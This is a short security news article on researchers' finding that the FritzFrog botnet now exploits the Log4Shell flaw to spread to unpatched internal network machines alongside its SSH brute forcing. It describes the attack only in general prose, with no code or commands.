Governance & Risk Management , Patch Management
FritzFrog Botnet Exploits Log4Shell
Botnet Looks for Vulnerable Internal Network MachinesDelivering more proof that the Log4Shell vulnerability is endemic, Akamai researchers detected botnet malware updated to use the flaw as an infection vector, supplementing its usual remote login brute force technique.
See Also: Active Directory Masterclass | Think Like an Attacker, Defend Like a Pro
Akamai Security Intelligence Group observed the shift in the FritzFrog botnet, first documented in 2020.
Log4Shell, tracked as CVE-2021-44228, burst into public awareness in late 2021 when security researchers identified a flaw in the ubiquitous Apache Log4J 2 Java library. A panel of U.S. public and private sector security experts in mid-2022 warned that patching every vulnerable Log4j instance would likely take a decade "or longer" (see: Log4j Flaw Is 'Endemic,' Says Cyber Safety Review Board).
To spread their malware, FritzFrog operators exploit the fact that system administrators give lower priority to patching internal network machines. Internet-facing applications are an obvious priority for patching. But unpatched internal machines can still be a risk, the researchers said. FritzFrog looks for subnets and targets possible addresses within them.
"This means that even if the 'high-profile' internet-facing applications have been patched, a breach of any asset in the network by FritzFrog can expose unpatched internal assets to exploitation," they said.
To trigger the Log4Shell vulnerability, FritzFrog forces an application to log data containing a malicious payload. The payload forces the Java application to connect to a server controlled by the attacker and download a malware binary.
Researchers in 2022 called FritzFrog a "new generation" of botnet for its use of a proprietary peer-to-peer protocol to spread across SSH servers worldwide.
It still uses brute force techniques to infect SSH servers, Akamai said, but will now "also attempt to identify specific SSH targets by enumerating several system logs on each of its victims."